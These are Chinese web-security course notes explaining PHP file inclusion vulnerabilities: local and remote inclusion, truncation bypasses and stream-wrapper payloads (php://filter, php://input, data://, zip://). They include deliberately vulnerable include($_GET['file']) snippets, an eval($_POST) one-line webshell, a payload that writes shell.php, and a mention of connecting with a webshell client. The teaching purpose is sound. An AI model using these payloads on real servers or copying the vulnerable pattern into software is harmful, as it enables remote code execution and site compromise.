31-WEB漏洞-文件操作之文件包含漏洞全解

31-WEB漏洞-文件操作之文件包含漏洞全解

  • 一、本地包含
    • 1.1、无限制包含漏洞文件
    • 1.2、有限制包含漏洞文件
      • 1.2.1、绕过方法
        • 1.2.1.1、%00截断
        • 1.2.1.2、长度截断
  • 二、远程包含
    • 2.1、无限制包含漏洞文件
    • 2.2、有限制包含漏洞文件
  • 三、各种协议流提交流
    • 3.1、各协议的利用条件和方法
      • 3.1.1、php://input
      • 3.1.2、file://
      • 3.1.3、`http://`、`https://`
      • 3.1.4、`php://`
      • 3.1.5、php://filter参数详解
      • 3.1.6、`phar://`、`zip://`、`bzip2://`、`zlib://`
      • 3.1.7、`data://`
  • 四、 总结
  • 五、涉及资源

31-WEB漏洞-文件操作之文件包含漏洞全解_第1张图片

#文件包含漏洞

原理,检测,类型,利用,修复等

#文件包含各个脚本代码
ASP,PHP,JSP,ASPX等

<!-—#include file="1.asp " -->

<!--#include file="top.aspx"-->

<c:import url="http://lthief.one/1.jsp">

<jsp:include page="head .jsp" / >

<%@ include file="head.jsp" %>

<?php Include ( 'test.php ' ) ?>
  • 单纯访问phpinfo.txt文件

31-WEB漏洞-文件操作之文件包含漏洞全解_第2张图片

  • 文件包含访问phpinfo.txt文件

31-WEB漏洞-文件操作之文件包含漏洞全解_第3张图片

一、本地包含

1.1、无限制包含漏洞文件

  • include.php:
<?php

$filename=$_GET['file'];
include ( $filename);

?>

31-WEB漏洞-文件操作之文件包含漏洞全解_第4张图片

1.2、有限制包含漏洞文件

  • include1.php:
<?php


$filename=$_GET['file'];
include ( $filename.".html" );

?>

31-WEB漏洞-文件操作之文件包含漏洞全解_第5张图片

  • 传入flag.txt文件参数(执行失败,因为在当前目录不存在flag.txt.html文件)

1.2.1、绕过方法

1.2.1.1、%00截断
  • 条件:

    • magic_quotes_gpc=off
    • php版本<5.3.4
  • 原理:

    • 00截断是操作系统层的漏洞,由于操作系统是C语言或汇编语言编写的,这两种语言在定义字符串时,都是以\0(即0x00)作为字符串的结尾。操作系统在识别字符串时,当读取到\0字符时,就认为读取到了一个字符串的结束符号。
      31-WEB漏洞-文件操作之文件包含漏洞全解_第6张图片
      31-WEB漏洞-文件操作之文件包含漏洞全解_第7张图片
  • 这里不知道为啥不能截断,所以放弃了
    31-WEB漏洞-文件操作之文件包含漏洞全解_第8张图片

1.2.1.2、长度截断
  • 原理(垃圾数据溢出)

  • 超过文件命名256位,后面的HTML就没有被识别,而flag.txt././被当成flag.txt执行
    31-WEB漏洞-文件操作之文件包含漏洞全解_第9张图片
    31-WEB漏洞-文件操作之文件包含漏洞全解_第10张图片

  • 这里也不行了

二、远程包含

  • 条件:
    31-WEB漏洞-文件操作之文件包含漏洞全解_第11张图片

2.1、无限制包含漏洞文件

  • include.php:
<?php

$filename=$_GET['file'];
include ( $filename);

?>

31-WEB漏洞-文件操作之文件包含漏洞全解_第12张图片
31-WEB漏洞-文件操作之文件包含漏洞全解_第13张图片

31-WEB漏洞-文件操作之文件包含漏洞全解_第14张图片

  • 包含一句话木马:
<?php eval($_POST['cmd'])?>

31-WEB漏洞-文件操作之文件包含漏洞全解_第15张图片

31-WEB漏洞-文件操作之文件包含漏洞全解_第16张图片

  • 也可以使用菜刀进行连接:
    31-WEB漏洞-文件操作之文件包含漏洞全解_第17张图片

2.2、有限制包含漏洞文件

  • include1.php:
<?php

$filename=$_GET['file'];
include ( $filename.".html" );

?>

31-WEB漏洞-文件操作之文件包含漏洞全解_第18张图片

  • ?号:
    31-WEB漏洞-文件操作之文件包含漏洞全解_第19张图片

  • %20号:
    31-WEB漏洞-文件操作之文件包含漏洞全解_第20张图片

  • %23号:
    31-WEB漏洞-文件操作之文件包含漏洞全解_第21张图片

  • 使用一句话木马:
    31-WEB漏洞-文件操作之文件包含漏洞全解_第22张图片
    31-WEB漏洞-文件操作之文件包含漏洞全解_第23张图片

三、各种协议流提交流

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流
  • php.ini参数设置
    • php.ini里有两个重要的参数allow_url_fopenallow_url_include
    • allow_url_fopen:默认值是ON。允许url里的封装协议访问文件;
    • allow_url_include:默认值是OFF。不允许包含url里的封装协议包含文件;

3.1、各协议的利用条件和方法

31-WEB漏洞-文件操作之文件包含漏洞全解_第24张图片

3.1.1、php://input

  • php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input同时post想设置的文件内容,php执行时会将post内容当作文件内容。
  • :当enctype=”multipart/form-data”时,php://input是无效的。

3.1.2、file://

  • 用于访问本地文件系统。当指定了一个相对路径(不以/、、\或 Windows 盘符开头的路径)提供的路径将基于当前的工作目录。
  • file://[文件的绝对路径和文件名]
    • http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
  • [文件的相对路径和文件名]
    • http://127.0.0.1/include.php?file=./phpinfo.txt

3.1.3、http://https://

  • URL 形式,允许通过 HTTP 1.0 的 GET方法,以只读访问文件或资源,通常用于远程包含。
  • [http://网络路径和文件名]
    • http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt

3.1.4、php://

  • php:// 用于访问各个输入/输出流(I/O streams),经常使用的是php://filterphp://inputphp://filter用于读取源码php://input用于执行php代码
    31-WEB漏洞-文件操作之文件包含漏洞全解_第25张图片

3.1.5、php://filter参数详解

31-WEB漏洞-文件操作之文件包含漏洞全解_第26张图片

  • 可用的过滤器列表(4类):
    31-WEB漏洞-文件操作之文件包含漏洞全解_第27张图片
    31-WEB漏洞-文件操作之文件包含漏洞全解_第28张图片
    31-WEB漏洞-文件操作之文件包含漏洞全解_第29张图片
    在这里插入图片描述
  • 读取文件源码用法:
php://filter/read=convert.base64-encode/resource=[文件名]
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php
  • 执行php代码用法:
php://input + [POST DATA]
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php phpinfo(); ?>
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php fputs(fopen('shell.php','w'),''); ?>

3.1.6、phar://zip://bzip2://zlib://

  • 用于读取压缩文件,zip:// 、 bzip2:// 、 zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可修改为任意后缀:jpg png gif xxx 等等。
1、zip://[压缩文件绝对路径]%23[压缩文件内的子文件名]#编码为%23)
http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt
 
2、compress.bzip2://file.bz2
http://127.0.0.1/include.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpghttp://127.0.0.1/include.php?file=compress.bzip2://./file.jpg
 
3、compress.zlib://file.gz
http://127.0.0.1/include.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpghttp://127.0.0.1/include.php?file=compress.zlib://./file.jpg4、phar://

3.1.7、data://

  • 数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。
1、data://text/plain,
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
 
2、data://text/plain;base64,
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

四、 总结

  • 伪协议常常用于文件包含漏洞之中。
  • 在php中能够造成文件包含的函数有includerequireinclude_oncerequire_oncehighlight_filehow_sourcefile_get_contentsfopenfilereadfile
    • include函数:可以放在PHP脚本的任意位置,一般放在流程控制的处理部分中。当PHP脚本执行到include指定引入的文件时,才将它包含并尝试执行。当第二次遇到相同文件时,PHP还是会重新解释一次。
    • require函数:一般放在PHP脚本的最前面,PHP执行前就会先读入require指定引入的文件,包含并尝试执行引入的脚本文件。require的工作方式是提高PHP的执行效率,当它在同一个网页中解释过一次后,第二次便不会解释。
    • include_oncerequire_once函数:分别与require / include作用相同,不同的是他们在执行到时会先检查目标内容是不是在之前已经导入过,如果导入过了,那么便不会再次重复引入其同样的内容。
    • hightfile函数:highlight_file(filename,return) —— filename:必需。要进行高亮处理的 PHP 文件的路径。return:可选。如果设置 true,则本函数返回高亮处理的代码。该函数通过使用 PHP 语法高亮程序中定义的颜色,输出或返回包含在 filename 中的代码的语法高亮版本。
    • show_source函数:该函数是highlight_file函数的别名。
    • file_get_content函数:把整个文件读入一个字符串中。和 file() 一样,不同的是 file_get_contents() 把文件读入一个字符串。
    • file() 函数:把整个文件读入一个数组中。与 file_get_contents() 类似,不同的是 file() 将文件作为一个数组返回。数组中的每个单元都是文件中相应的一行,包括换行符在内。如果失败,则返回 false。

五、涉及资源

  • https://www.ichunqiu.com/battalion?t=1&r=0
  • http://4.chinalover.sinaapp.com/web7/index.php
  • https://www.cnblogs.com/endust/p/11804767.html #php伪协议
  • https://pan.baidu.com/s/1x_mwVE-xxmoKAvDJ8mRsw 提取码:xiao

你可能感兴趣的:(小迪安全,web安全,前端,小迪安全,安全)